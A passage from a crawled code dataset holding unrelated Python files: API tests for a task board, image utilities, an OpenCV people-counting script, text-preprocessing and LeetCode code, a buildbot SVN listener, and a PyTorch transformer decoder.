'desc'\n\n\ndef create_task():\n return api.create_task(title, desc)\n\n\ndef create_list(title='list title'):\n return api.create_list(title)\n\n\ndef create_board(title='board title'):\n return api.create_board(title)\n\n\ndef get_task_by_id(id):\n return db.query(Task).get(id)\n\n\ndef get_list(id):\n return db.query(List).get(id)\n\n\ndef get_board(id):\n return db.query(Board).get(id)\n\n\nclass TestBoardApi(object):\n def test_create_board(self):\n board_id = create_board()\n board = get_board(board_id)\n assert board.title == 'board title'\n\n def test_add_list_to_board(self):\n board_id = create_board()\n list_id = create_list()\n api.add_to_board(board_id, list_id)\n\n board = get_board(board_id)\n assert len(board.lists) == 1\n assert board.lists[0].title == 'list title'\n\n def test_remove_list_from_board(self):\n board_id = create_board()\n list_id = create_list()\n api.add_to_board(board_id, list_id)\n\n board = get_board(board_id)\n assert len(board.lists) == 1\n assert board.lists[0].title == 'list title'\n\n api.remove_from_board(board_id, list_id)\n board = get_board(board_id)\n assert len(board.lists) == 0\n\n\nclass TestListApi(object):\n def test_create_list(self):\n list_id = create_list()\n list = get_list(list_id)\n assert list.title == 'list title'\n\n def test_add_task_to_list(self):\n task_id = create_task()\n list_id = create_list()\n api.add_to_list(list_id, task_id)\n\n list = get_list(list_id)\n assert len(list.tasks) == 1\n assert list.tasks[0].title == 'title'\n assert list.tasks[0].description == 'desc'\n\n def test_remove_task_from_list(self):\n task_id = create_task()\n list_id = create_list()\n api.add_to_list(list_id, task_id)\n\n list = get_list(list_id)\n assert len(list.tasks) == 1\n assert list.tasks[0].title == 'title'\n\n api.remove_from_list(list_id, task_id)\n list = get_list(list_id)\n assert len(list.tasks) == 0\n\n def test_task_to_be_in_backlog_on_creation(self):\n backlog_id = api.backlog_id\n task_id = create_task()\n task = get_task_by_id(task_id)\n assert backlog_id in [task_list.id for task_list in task.list]\n\n def test_task_can_be_moved_from_one_list_to_another(self):\n backlog_id = api.backlog_id\n task_id = create_task()\n todo_list_id = create_list('todo')\n api.move_task(backlog_id, todo_list_id, task_id)\n task = get_task_by_id(task_id)\n task_list_ids = [task_list.id for task_list in task.list]\n assert backlog_id not in task_list_ids\n assert todo_list_id in task_list_ids\n\n\nclass TestTaskApi():\n def test_create_task(self):\n task_id = create_task()\n\n q_task = get_task_by_id(task_id)\n assert q_task.title == title\n assert q_task.description == desc\n\n def test_add_time(self):\n task_id = create_task()\n\n minutes1 = 10\n desc1 = 'dummy description'\n\n api.add_time(task_id, minutes1, desc1)\n\n q_task = get_task_by_id(task_id)\n assert len(q_task.times) == 1\n assert q_task.times[0].minutes == minutes1\n assert q_task.times[0].description == desc1\n\n def test_start_task(self):\n task_id = create_task()\n api.start_task(task_id)\n q_task = get_task_by_id(task_id)\n assert q_task.state == TaskState.IN_PROGRESS\n\n def test_complete_task(self):\n task_id = create_task()\n api.start_task(task_id)\n api.complete_task(task_id)\n q_task = get_task_by_id(task_id)\n assert q_task.state == TaskState.COMPLETED\n","repo_name":"ahmedshuhel/ht","sub_path":"tests/test_api.py","file_name":"test_api.py","file_ext":"py","file_size_in_byte":3925,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70667965354","text":"import time\nfrom functools import wraps\n\n\ndef stop_watch(func: callable) -> callable:\n\t\"\"\"\t関数の実行時間測定\n\n\tArgs:\n\t\t\tfunc (callable): 測定対象の関数\n\n\tReturns:\n\t\t\tcallable: 関数\n\t\"\"\"\n\t@wraps(func)\n\tdef wrapper(*args, **kargs) :\n\t\tstart = time.time()\n\t\tresult = func(*args, **kargs)\n\t\tprocess_time = time.time() - start\n\t\tprint(f\"-- {func.__name__} : {int(process_time)}[sec] / {int(process_time/60)}[min]\")\n\t\treturn result\n\treturn wrapper\n\n\ndef decode_area(region: tuple) -> tuple[int, list, float]:\n\t\"\"\" 領域データをlabel, coords, areaに変換\n\n\tArgs:\n\t\t\tregion (tuple): PyMeanShiftで抽出した領域csvデータ\n\n\tReturns:\n\t\t\ttuple: ラベル番号・座標・面積\n\t\"\"\"\n\t# 領域ID\n\tlabel = int(region[0])\n\t# 座標\n\tcoords = [\n\t\t(int(coord_str[1:-1].split(' ')[0]), int(coord_str[1:-1].split(' ')[1])) \n\t\tfor coord_str in region[1:-2]\n\t]\n\t\t# 面積\n\tarea = int(region[-2])\n\n\treturn label, coords, area\n\n\ndef is_index(size: tuple[int, int, int], coordinate: tuple[int, int]) -> bool:\n\t\"\"\"\tタプル型座標が画像領域内に収まっているかを判定\n\n\tArgs:\n\t\t\tsize (tuple[int, int, int]): 画像サイズ\n\t\t\tcoordinate (tuple[int, int]): タプル型座標\n\n\tReturns:\n\t\t\tbool: 判別結果\n\t\"\"\"\n\t# (0 <= y < height) & (0 <= x < width)\n\tif \t(((coordinate[0] >= 0) and (coordinate[0] < size[0])) \n\tand ((coordinate[1] >= 0) and (coordinate[1] < size[1]))):\n\t\treturn True\n\telse:\n\t\treturn False\n","repo_name":"donuthole8/sediment-flow","sub_path":"modules/utils/common_util.py","file_name":"common_util.py","file_ext":"py","file_size_in_byte":1440,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15452026429","text":"# Importando os pacotes necessários\nfrom argparse import ArgumentParser\nimport cv2\nimport dlib\nimport imutils\nimport numpy as np\nimport time\nfrom imutils.video import VideoStream\nfrom imutils.video import FPS\nfrom scipy.spatial import distance as dist\nfrom collections import OrderedDict\n\n\nclass TrackableObj:\n def __init__(self, objectID, centroid):\n self.objID = objectID\n self.centroids = [centroid]\n self.counted = False\n\n\nclass CentroidTrk:\n def __init__(self, maxDisappeared=50, maxDistance=50):\n self.nxtObjectID = 0\n self.objs = OrderedDict()\n self.desaparecidos = OrderedDict()\n\n self.mxDisappeared = maxDisappeared\n\n self.mxDistance = maxDistance\n\n def deregister(self, objectID):\n del self.objs[objectID]\n del self.desaparecidos[objectID]\n\n def register(self, centroid):\n self.objs[self.nxtObjectID] = centroid\n self.desaparecidos[self.nxtObjectID] = 0\n self.nxtObjectID += 1\n\n def update(self, rects):\n if len(rects) == 0:\n for objectID in list(self.desaparecidos.keys()):\n self.desaparecidos[objectID] += 1\n if self.desaparecidos[objectID] > self.mxDisappeared:\n self.deregister(objectID)\n return self.objs\n\n inputCentroids = np.zeros((len(rects), 2), dtype=\"int\")\n\n for (i, (startX, startY, endX, endY)) in enumerate(rects):\n cX = int((startX + endX) / 2.0)\n cY = int((startY + endY) / 2.0)\n inputCentroids[i] = (cX, cY)\n\n if len(self.objs) == 0:\n for i in range(0, len(inputCentroids)):\n self.register(inputCentroids[i])\n\n else:\n objectIDs = list(self.objs.keys())\n objectCentroids = list(self.objs.values())\n\n D = dist.cdist(np.array(objectCentroids), inputCentroids)\n\n rows = D.min(axis=1).argsort()\n cols = D.argmin(axis=1)[rows]\n\n usedCols = set()\n usedRows = set()\n\n for (row, col) in zip(rows, cols):\n if row in usedRows or col in usedCols:\n continue\n\n if D[row, col] > self.mxDistance:\n continue\n\n objectID = objectIDs[row]\n self.objs[objectID] = inputCentroids[col]\n self.desaparecidos[objectID] = 0\n\n usedRows.add(row)\n usedCols.add(col)\n\n unusedRows = set(range(0, D.shape[0])).difference(usedRows)\n unusedCols = set(range(0, D.shape[1])).difference(usedCols)\n\n if D.shape[0] >= D.shape[1]:\n for row in unusedRows:\n objectID = objectIDs[row]\n self.desaparecidos[objectID] += 1\n\n if self.desaparecidos[objectID] > self.mxDisappeared:\n self.deregister(objectID)\n\n else:\n for col in unusedCols:\n self.register(inputCentroids[col])\n\n return self.objs\n\n\nclass CrowdControl:\n def __init__(self):\n # Analise dos argumentos da linha de comando\n self.argumentos = ArgumentParser()\n self.argumentos.add_argument(\"-i\", \"--input\", type=str,\n help=\"caminho para o vídeo de entrada\")\n self.argumentos.add_argument(\"-o\", \"--output\", type=str,\n help=\"caminho para o vídeo de saída\")\n self.argumentos = vars(self.argumentos.parse_args())\n\n # Inicializa a lista de classes que o modelo MobileNet SSD foi treinado para detectar\n CLASSES = [\"background\", \"aeroplane\", \"bicycle\", \"bird\", \"boat\",\n \"bottle\", \"bus\", \"car\", \"cat\", \"chair\", \"cow\", \"diningtable\",\n \"dog\", \"horse\", \"motorbike\", \"person\", \"pottedplant\", \"sheep\",\n \"sofa\", \"train\", \"tvmonitor\"]\n\n # carrega os modelos serializados do disco\n net = cv2.dnn.readNetFromCaffe(\n \"mobilenet_ssd/MobileNetSSD_deploy.prototxt\", \"mobilenet_ssd/MobileNetSSD_deploy.caffemodel\")\n\n # Se o caminho do vídeo não for especificado, muda o stream de vídeo para webcam\n if not self.argumentos.get(\"input\", False):\n vs = VideoStream(src=0).start()\n time.sleep(2.0)\n\n # caso contrário abra o vídeo especificado\n else:\n vs = cv2.VideoCapture(self.argumentos[\"input\"])\n\n # Inicializa o ponteiro de escrita de vídeo\n writer = None\n\n # Inicializa as dimensões do quadro\n W = None\n H = None\n\n # Instancia o rastreador do centroid, então inicialisa uma lista para armazenar\n # cada uma dos rastreadores correlacionados da dlib, seguindo de um\n # dicionário mapeando cada um dos objetos únicos para um objeto do tipo TrackableObj\n ct = CentroidTrk(maxDisappeared=40, maxDistance=50)\n trackers = []\n trackableObjects = {}\n\n # Inicializa o número total de frames processados até então, além\n # do número total de objetos além dos que se moveram para cima ou para baixo\n totalFrames, totalDown, totalUp = (0, 0, 0)\n\n # Inicializa a estimativa de frames por segundo\n fps = FPS().start()\n\n # Loop principal, que passa pelos frames do stream de vídeo\n while True:\n # Captura o próximo quadro e toma decisões diferentes se a fonte dos frames\n # for VideoCapture ou VideoStream\n\n quadro = vs.read()\n quadro = quadro[1] if self.argumentos.get(\"input\", False) else quadro\n\n # Se o vídeo esta sendo reproduzido e não foi possível pegar o próximo quadro\n # então o vídeo chegou ao final\n\n if self.argumentos[\"input\"] is not None and quadro is None:\n break\n\n # redimensiona o quadro para o máximo de 500 pixels ( quanto menos dados para\n # analisar, mais rápida será a analise ), então converte o quadro do formato\n # BGR para RGB para futura analise com dlib\n\n quadro = imutils.resize(quadro, width=500)\n rgb = cv2.cvtColor(quadro, cv2.COLOR_BGR2RGB)\n\n # Caso as dimensões do quadro forem vazias, ajuste\n if W is None or H is None:\n (H, W) = quadro.shape[:2]\n\n # Se o vídeo será gravado em disco, inialize o ponteiro de escrita\n if self.argumentos[\"output\"] is not None and writer is None:\n fourcc = cv2.VideoWriter_fourcc(*\"MJPG\")\n writer = cv2.VideoWriter(self.argumentos[\"output\"], fourcc, 30,\n (W, H), True)\n\n # Inicializa o estatus corrente do processamento\n status = \"Aguardando\"\n rects = []\n\n # Verifica se o algorítimo é adequado para para o rastreamento dos objetos\n # detectados\n if totalFrames % 30 == 0:\n # Configura o status e inicializa uma lista de rastreadores\n status = \"Detectando\"\n trackers = []\n\n # Converte o quadro para um blob e passe esse blob para a rede neural\n # e obtem a direção do movimento\n blob = cv2.dnn.blobFromImage(quadro, 0.007843, (W, H), 127.5)\n net.setInput(blob)\n deteccao = net.forward()\n\n # Roda o loop para as detecções\n for i in np.arange(0, deteccao.shape[2]):\n # extrai o nível de confiança associada a previsão\n confianca = deteccao[0, 0, i, 2]\n\n # filtra detecções fracas exigindo um nível mínimo de confiança\n if confianca > 0.4:\n # extrai o índice das classes da lista de detecção\n idx = int(deteccao[0, 0, i, 1])\n\n # Se a classe não for uma pessoa ignore.\n if CLASSES[idx] != \"person\":\n continue\n\n # calcula as coordenadas (x, y) da caixa de colisão para cada\n # objeto\n\n box = deteccao[0, 0, i, 3:7] * np.array([W, H, W, H])\n (sX, sY, eX, eY) = box.astype(\"int\")\n\n # constroi a abstração geométrica da correlação do dlib\n tracker = dlib.correlation_tracker()\n rect = dlib.rectangle(sX, sY, eX, eY)\n tracker.start_track(rgb, rect)\n\n # adiciona o rastreador na lista de rastreadores\n trackers.append(tracker)\n\n else:\n # loop para os rastreadores\n for tracker in trackers:\n status = \"Rastreando\"\n\n # atualiza o rastreador e armazena posição\n tracker.update(rgb)\n posicao = tracker.get_position()\n\n # armazena posição do objeto\n sX = int(posicao.left())\n sY = int(posicao.top())\n eX = int(posicao.right())\n eY = int(posicao.bottom())\n\n # adiciona posição do objeto para o array de colisões\n rects.append((sX, sY, eX, eY))\n\n # desenha uma linha horizontal no centro do quadro, uma vez que um objeto cruza\n # a linha ele é determinado se ele esta entrando ou saindo\n cv2.line(quadro, (0, H // 2),\n (W, H // 2), (0, 255, 0), 2)\n\n # Usar o rastreador do rastreador do centroid para associar o centroid antigo\n # com os centroids novos recém computados\n objects = ct.update(rects)\n\n # loop pelos objetos rastreados\n for (objID, centroid) in objects.items():\n # verifica que o objeto rastreado existe para o objeto atual\n to = trackableObjects.get(objID, None)\n\n # se não existe o objeto rastreado, crie um\n if to is None:\n to = TrackableObj(objID, centroid)\n\n # caso contrário, existe um objeto rastreado que podemos usar para determinar a direção\n else:\n # a diferença entre a coordernada y do centroid atual e do centroid\n # anterior nos ajuda a determinar se o objeto esta se movendo para\n # dentro do espaço público ou para fora\n\n x = [i[1] for i in to.centroids]\n\n direction = centroid[1] - np.mean(x)\n\n to.centroids.append(centroid)\n\n # verifica se o objeto já foi contado ou não\n if not to.counted:\n # Se a direção é negativa (indica que o objeto se move para cima)\n # e o centroid está acima da linha central, conte o objeto\n\n if direction < 0 and centroid[1] < H // 2:\n totalUp += 1\n to.counted = True\n\n # Se a direção é positiva (indica que o objeto se move para baixo)\n # is moving down) e o centroid está abaixo da linha central,\n # conte o objeto\n elif direction > 0 and centroid[1] > H // 2:\n totalDown += 1\n to.counted = True\n\n # registre o objeto rastreado no dicionário\n trackableObjects[objID] = to\n\n # desenher tanto o ID do objeto e o centroid no quadro de saída\n text = \"ID {}\".format(objID)\n cv2.putText(quadro, text, (centroid[0] - 10, centroid[1] - 10),\n cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 255, 0), 2)\n cv2.circle(\n quadro, (centroid[0], centroid[1]), 4, (0, 255, 0), -1)\n\n # constroi uma tupla com as informações mostradas no quadro\n info = [\n (\"Entrando\", totalUp),\n (\"Saindo\", totalDown),\n (\"Lotacao\", totalUp - totalDown),\n ]\n\n # itera sobre o conteúdo da tupla e desenha no quadro\n for (i, (k, v)) in enumerate(info):\n text = \"{}: {}\".format(k, v)\n cv2.putText(quadro, text, (10, H - ((i * 20) + 20)),\n cv2.FONT_HERSHEY_SIMPLEX, 0.6, (0, 0, 255), 2)\n\n # verifique se o quadro deve ser gravado em disco\n if writer is not None:\n writer.write(quadro)\n\n # mostra o quadro de saída\n cv2.imshow(\"Frame\", quadro)\n key = cv2.waitKey(1) & 0xFF\n\n # se a tecla `q` for pressionado quebre o loop\n if key == ord(\"q\"):\n break\n\n # incrementa o número total de frames processados e atualiza o contador de FPS\n totalFrames += 1\n fps.update()\n\n # pare o timer e mostre o FPS\n fps.stop()\n\n # verifique se é necessário liberar o ponteiro de escrita\n if writer is not None:\n writer.release()\n\n # se um arquivo de vídeo não esta sendo utilizado pare o stream de vídeo\n if not self.argumentos.get(\"input\", False):\n vs.stop()\n\n # caso contrário, libere o ponteiro de escrita do vídeo\n else:\n vs.release()\n\n # feche todas as janelas\n cv2.destroyAllWindows()\n\nCrowdControl()","repo_name":"liquuid/pi4","sub_path":"crowdcontrol.py","file_name":"crowdcontrol.py","file_ext":"py","file_size_in_byte":13658,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"21429564016","text":"from os import mkdir, listdir\nfrom os.path import isdir\n\nfrom pandas import read_csv, DataFrame\nfrom nltk import sent_tokenize\n\nfrom Utilities.preprocess_data import preprocessed_text\n\n\ndef removeLines(text: str) -> str:\n tokens = sent_tokenize(text)\n return ' \\n\\n'.join([token for token in tokens if len(token.split()) > 3])\n\n\ndef preprocess(text: str) -> str:\n text = text.strip()\n if text != '' and str.isalnum(text[-1]):\n text += '.'\n return text\n\n\ndef savefile(text: str, path: str):\n with open(path, 'w') as f:\n f.write(text)\n\n\ndef addNone(text: str) -> str:\n if len(text) == 0:\n return str('None.')\n else:\n return text\n\n\ndef makeSectionFolders():\n df = read_csv('Data/Sections-DataFrame/sections.csv', index_col='ID')\n\n for section in ['Abstract', 'Conclusions', 'Discussion', 'Introduction']:\n\n section_df = df[[section]]\n section_df.fillna('None.', inplace=True)\n\n section_df.loc[:, section] = section_df.loc[:, section].map(str).apply(\n lambda x: preprocessed_text(x, keep_parenthesis=True)).apply(removeLines)\n\n section_df.loc[:, section] = section_df.loc[:, section].apply(preprocess)\n section_df.loc[:, section] = section_df.loc[:, section].apply(addNone)\n\n if not isdir(f'Data/Input-wMVC/{section}/'):\n mkdir(f'Data/Input-wMVC/{section}/')\n\n for idx, inputs in zip(section_df.index, section_df.loc[:, section]):\n savefile(inputs, f'Data/Input-wMVC/{section}/{idx}.txt')\n\n\ndef getSectionDataFrames():\n # Folder must contain FULLTEXT & ABSTRACT files for each doc in it\n testset_path = 'Data/Input-Data/'\n\n testset_data = {\n 'ID': [],\n 'Prefix': [],\n 'Title': [],\n 'Full_Text': [],\n 'Abstract': []\n }\n\n ID_set = set()\n\n for file in listdir(testset_path):\n if not file.startswith('.'):\n ID_set.add(file.split('_')[0])\n\n ID_set = list(ID_set)\n\n for ID in ID_set:\n testset_data['ID'].append(ID)\n for file in listdir(testset_path):\n if not file.startswith('.'):\n if file.split('_')[0] == ID:\n if file.split('_')[1] == 'ABSTRACT':\n with open(testset_path + file, 'r') as f:\n testset_data['Prefix'].append(f.readline())\n for _ in range(5):\n f.readline()\n testset_data['Title'].append(f.readline())\n f.readline()\n testset_data['Abstract'].append(' '.join(f.read().split('PARAGRAPH')[:]))\n\n elif file.split('_')[1] == 'FULLTEXT':\n with open(testset_path + file, 'r') as f:\n for _ in range(8):\n f.readline()\n testset_data['Full_Text'].append(f.read())\n\n testdata_df = DataFrame(testset_data)\n\n # Getting separate sections from FULLTEXT\n\n introduction = []\n discussion = []\n conclusions = []\n\n for idx, fulltext in enumerate(testdata_df.iloc[:, 3]):\n intro = ''\n conc = ''\n disc = ''\n for text in fulltext.split('SECTION\\n\\n')[1:]:\n if 'introduction' in text.split('PARAGRAPH')[0].lower():\n intro = intro + ''.join(text.split('PARAGRAPH')[1:])\n\n elif 'discussion' in text.split('PARAGRAPH')[0].lower():\n disc = disc + ''.join(text.split('PARAGRAPH')[1:])\n\n elif 'conclusion' in text.split('PARAGRAPH')[0].lower():\n conc = conc + ''.join(text.split('PARAGRAPH')[1:])\n\n if intro == '':\n introduction.append(None)\n else:\n introduction.append(intro)\n\n if conc == '':\n conclusions.append(None)\n else:\n conclusions.append(conc)\n\n if disc == '':\n discussion.append(None)\n else:\n discussion.append(disc)\n\n testdata_df['Introduction'] = introduction\n testdata_df['Discussion'] = discussion\n testdata_df['Conclusions'] = conclusions\n\n # Saving DataFrame\n testdata_df.index = testdata_df.ID\n testdata_df.drop('ID', axis=1, inplace=True)\n testdata_df.to_csv('Data/Sections-DataFrame/sections.csv')\n\n\ndef prepareData():\n getSectionDataFrames()\n makeSectionFolders()\n","repo_name":"anuragjoshi3519/laysumm20","sub_path":"Utilities/prepare_data.py","file_name":"prepare_data.py","file_ext":"py","file_size_in_byte":4407,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"30422314899","text":"class Solution(object):\n def convert(self, s, numRows):\n \"\"\"\n :type s: str\n :type numRows: int\n :rtype: str\n \"\"\"\n if numRows <= 0:\n return None\n if numRows == 1:\n return s\n\n # each index represents a stage in the cycle\n vals = [''] * numRows\n # value that iterates through the cycle\n index = 0\n direction = 0\n for ch in s:\n vals[index] += ch\n # we need to step up\n if index == 0:\n direction = 1\n elif index == numRows-1:\n direction = -1\n index += direction\n return ''.join(vals)\n \n","repo_name":"KaranPhadnisNaik/leetcode","sub_path":"0006.ZigZagConversion.py","file_name":"0006.ZigZagConversion.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19369828325","text":"print(\"hello world!\")\n\nname = \"Tuba\"\n\nnumber_of_students = 71\n\n#Here is some useful information!\n\nfor i in range(2):\n print('Tuba')\n\n# Today we have seen new commands on Git and GitHub\n\n","repo_name":"tubakadriye/PYTHON_PROJECT","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":189,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73899645992","text":"#!/usr/bin/env python\r\n\r\nfrom twisted.internet.protocol import Factory,Protocol\r\nfrom twisted.internet import reactor\r\nfrom twisted.protocols.basic import LineOnlyReceiver\r\nfrom twisted.python import log\r\n\r\nfrom buildbot.changes.svnpoller import SVNPoller\r\n\r\n\r\nclass SVNListenerProtocol(LineOnlyReceiver):\r\n hostname = None\r\n peername = None\r\n delimiter = '\\n'\r\n \r\n def connectionMade(self):\r\n peer = self.transport.getPeer()\r\n host = self.transport.getHost()\r\n self.peername = '%s:%s'%(peer.host, peer.port)\r\n self.hostname = '%s:%s'%(host.host, host.port)\r\n log.msg(\"CVSListenerProtocol: connection made from %s to %s\"%\r\n (self.peername, self.hostname))\r\n \r\n def lineReceived(self,line):\r\n line = line.rstrip('\\r')\r\n #print \"Data:%s:\" % data\r\n if line == self.factory.signature:\r\n if self.factory.delayed and self.factory.delayed.active():\r\n self.factory.delayed.reset(self.factory.delay)\r\n elif self.factory.poller and not self.factory.poller.working:\r\n log.msg(\"SVNListenerProtocol: initiating SVN check on behalf of %s\"%self.peername)\r\n self.factory.delayed = reactor.callLater(self.factory.delay,\r\n self.factory.poller.checkcvs)\r\n else:\r\n if len(line) > len(self.factory.signature):\r\n line = '%s...'%line[:len(self.factory.signature) + 10]\r\n log.msg(\"SVNListenerProtocol: invalid signature sent from %s: %s\"%\r\n (self.peername, line))\r\n self.transport.loseConnection()\r\n \r\n \r\nclass SVNListenerFactory(Factory):\r\n protocol = SVNListenerProtocol\r\n delayed = None\r\n \r\n def __init__(self, poller, signature, commitStableTimer=30):\r\n assert isinstance(poller, SVNPoller)\r\n self.poller = poller\r\n self.signature = signature\r\n self.delay = commitStableTimer\r\n\r\n\r\ndef startSVNListener(poller,signature,port):\r\n reactor.listenTCP(port,SVNListenerFactory(poller,signature))\r\n \r\n","repo_name":"gridlab-d/tools","sub_path":"buildbot/src/localbb/changes/svnlistener.py","file_name":"svnlistener.py","file_ext":"py","file_size_in_byte":2117,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"72"} +{"seq_id":"21703548583","text":"import torch\nimport torch.nn as nn\nfrom torch import Tensor\nimport torch.nn.functional as F\nfrom typing import Optional, List\nimport torch.nn.init as init\nimport copy\n\n# class SelfAttention(nn.Module):\n# def __init__(\n# self, dim, heads=8, qkv_bias=False, qk_scale=None, dropout_rate=0.0\n# ):\n# super().__init__()\n# self.num_heads = heads\n# head_dim = dim // heads\n# self.scale = qk_scale or head_dim ** -0.5\n\n# self.qkv = nn.Linear(dim, dim * 3, bias=qkv_bias)\n# self.attn_drop = nn.Dropout(dropout_rate)\n# self.proj = nn.Linear(dim, dim)\n# self.proj_drop = nn.Dropout(dropout_rate)\n\n# def forward(self, x):\n# B, N, C = x.shape\n# qkv = (\n# self.qkv(x)\n# .reshape(B, N, 3, self.num_heads, C // self.num_heads)\n# .permute(2, 0, 3, 1, 4)\n# )\n# q, k, v = (\n# qkv[0],\n# qkv[1],\n# qkv[2],\n# ) # make torchscript happy (cannot use tensor as tuple)\n\n# attn = (q @ k.transpose(-2, -1)) * self.scale\n# attn = attn.softmax(dim=-1)\n# attn = self.attn_drop(attn)\n\n# x = (attn @ v).transpose(1, 2).reshape(B, N, C)\n# x = self.proj(x)\n# x = self.proj_drop(x)\n# return x\n\nclass DecoderLayer(nn.Module):\n def __init__(self, self_attention, cross_attention, d_model, d_ff=None,\n dropout=0.1, activation=\"relu\"):\n super(DecoderLayer, self).__init__()\n d_ff = d_ff or 4*d_model\n self.self_attention = self_attention\n self.cross_attention = cross_attention\n self.conv1 = nn.Conv1d(in_channels=d_model, out_channels=d_ff, kernel_size=1)\n self.conv2 = nn.Conv1d(in_channels=d_ff, out_channels=d_model, kernel_size=1)\n self.norm1 = nn.LayerNorm(d_model)\n self.norm2 = nn.LayerNorm(d_model)\n self.norm3 = nn.LayerNorm(d_model)\n self.dropout = nn.Dropout(dropout)\n self.activation = F.relu if activation == \"relu\" else F.gelu\n\n def forward(self, x, cross, x_mask=None, cross_mask=None):\n x = x + self.dropout(self.self_attention(\n x, x, x,\n attn_mask=x_mask\n ))\n x = self.norm1(x)\n\n x = x + self.dropout(self.cross_attention(\n x, cross, cross,\n attn_mask=cross_mask\n ))\n\n y = x = self.norm2(x)\n y = self.dropout(self.activation(self.conv1(y.transpose(-1,1))))\n y = self.dropout(self.conv2(y).transpose(-1,1))\n\n return self.norm3(x+y)\n\n\nclass Decoder(nn.Module):\n def __init__(self, layers, norm_layer=None):\n super(Decoder, self).__init__()\n self.layers = nn.ModuleList(layers)\n self.norm = norm_layer\n\n def forward(self, x, cross, x_mask=None, cross_mask=None):\n for layer in self.layers:\n x = layer(x, cross, x_mask=x_mask, cross_mask=cross_mask)\n\n if self.norm is not None:\n x = self.norm(x)\n\n return x\n\nclass TransformerDecoder(nn.Module):\n\n def __init__(self, decoder_layer, num_layers, norm=None, return_intermediate=False):\n super().__init__()\n self.layers = _get_clones(decoder_layer, num_layers)\n self.num_layers = num_layers\n self.norm = norm\n self.return_intermediate = return_intermediate\n\n def forward(self, tgt, memory,\n tgt_mask: Optional[Tensor] = None,\n memory_mask: Optional[Tensor] = None,\n tgt_key_padding_mask: Optional[Tensor] = None,\n memory_key_padding_mask: Optional[Tensor] = None,\n pos: Optional[Tensor] = None,\n query_pos: Optional[Tensor] = None):\n output = tgt\n T,B,C = memory.shape\n intermediate = []\n\n for n,layer in enumerate(self.layers):\n \n residual=True\n output,ws = layer(output, memory, tgt_mask=tgt_mask,\n memory_mask=memory_mask,\n tgt_key_padding_mask=tgt_key_padding_mask,\n memory_key_padding_mask=memory_key_padding_mask,\n pos=pos, query_pos=query_pos,residual=residual)\n\n if self.return_intermediate:\n intermediate.append(self.norm(output))\n if self.norm is not None:\n output = self.norm(output)\n if self.return_intermediate:\n intermediate.pop()\n intermediate.append(output)\n\n if self.return_intermediate:\n return torch.stack(intermediate)\n return output\n\n\n\nclass TransformerDecoderLayer(nn.Module):\n\n def __init__(self, d_model, nhead, dim_feedforward=64, dropout=0.1,\n activation=\"relu\", normalize_before=False):\n super().__init__()\n self.self_attn = nn.MultiheadAttention(d_model, nhead, dropout=dropout)\n self.multihead_attn = nn.MultiheadAttention(d_model, nhead, dropout=dropout)\n # Implementation of Feedforward model\n self.linear1 = nn.Linear(d_model, dim_feedforward)\n self.dropout = nn.Dropout(dropout)\n self.linear2 = nn.Linear(dim_feedforward, d_model)\n\n self.norm1 = nn.LayerNorm(d_model)\n self.norm2 = nn.LayerNorm(d_model)\n self.norm3 = nn.LayerNorm(d_model)\n self.dropout1 = nn.Dropout(dropout)\n self.dropout2 = nn.Dropout(dropout)\n self.dropout3 = nn.Dropout(dropout)\n\n self.activation = _get_activation_fn(activation)\n self.normalize_before = normalize_before\n def with_pos_embed(self, tensor, pos: Optional[Tensor]):\n return tensor if pos is None else tensor + pos\n\n def forward_post(self, tgt, memory,\n tgt_mask: Optional[Tensor] = None,\n memory_mask: Optional[Tensor] = None, \n tgt_key_padding_mask: Optional[Tensor] = None,\n memory_key_padding_mask: Optional[Tensor] = None,\n pos: Optional[Tensor] = None,\n query_pos: Optional[Tensor] = None,\n residual=True):\n q = k = self.with_pos_embed(tgt, query_pos)\n tgt2,ws = self.self_attn(q, k, value=tgt, attn_mask=tgt_mask,\n key_padding_mask=tgt_key_padding_mask)\n tgt = self.norm1(tgt)\n tgt2,ws = self.multihead_attn(query=self.with_pos_embed(tgt, query_pos),\n key=self.with_pos_embed(memory, pos),\n value=memory, attn_mask=memory_mask,\n key_padding_mask=memory_key_padding_mask)\n\n\n # attn_weights [B,NUM_Q,T]\n tgt = tgt + self.dropout2(tgt2)\n tgt = self.norm2(tgt)\n tgt2 = self.linear2(self.dropout(self.activation(self.linear1(tgt))))\n tgt = tgt + self.dropout3(tgt2)\n tgt = self.norm3(tgt)\n return tgt,ws\n\n def forward_pre(self, tgt, memory,\n tgt_mask: Optional[Tensor] = None,\n memory_mask: Optional[Tensor] = None,\n tgt_key_padding_mask: Optional[Tensor] = None,\n memory_key_padding_mask: Optional[Tensor] = None,\n pos: Optional[Tensor] = None,\n query_pos: Optional[Tensor] = None):\n\n \n # q = k = self.with_pos_embed(tgt2, query_pos)\n # # # print(q.size(), k.size(), tgt2.size())\n # tgt2,ws = self.self_attn(q, k, value=tgt2, attn_mask=tgt_mask,\n # key_padding_mask=tgt_key_padding_mask)\n # tgt = tgt + self.dropout1(tgt2)\n # print('1', tgt.size(), memory.size())\n # sssss\n # tgt2 = self.norm2(tgt)\n # print(self.with_pos_embed(tgt2, query_pos).size(), self.with_pos_embed(memory, pos).size())\n memory = memory.permute(2,0,1).contiguous()\n # print(memory.size())\n # memory_mask = self._generate_square_subsequent_mask(memory.size(0),tgt2.size(0))\n # memory_mask = memory_mask.cuda()\n # print(memory_mask.size())\n # print(tgt2.size(),memory.size())\n # attn_output_weights = torch.bmm(tgt2,memory.transpose(1, 2))\n # print(attn_output_weights.size())\n # sss\n tgt2,attn_weights = self.multihead_attn(query=self.with_pos_embed(tgt, query_pos),\n key=self.with_pos_embed(memory, pos),\n value=memory, attn_mask=memory_mask,\n key_padding_mask=memory_key_padding_mask)\n tgt2 = self.norm1(tgt2)\n # # print(tgt2.size(), 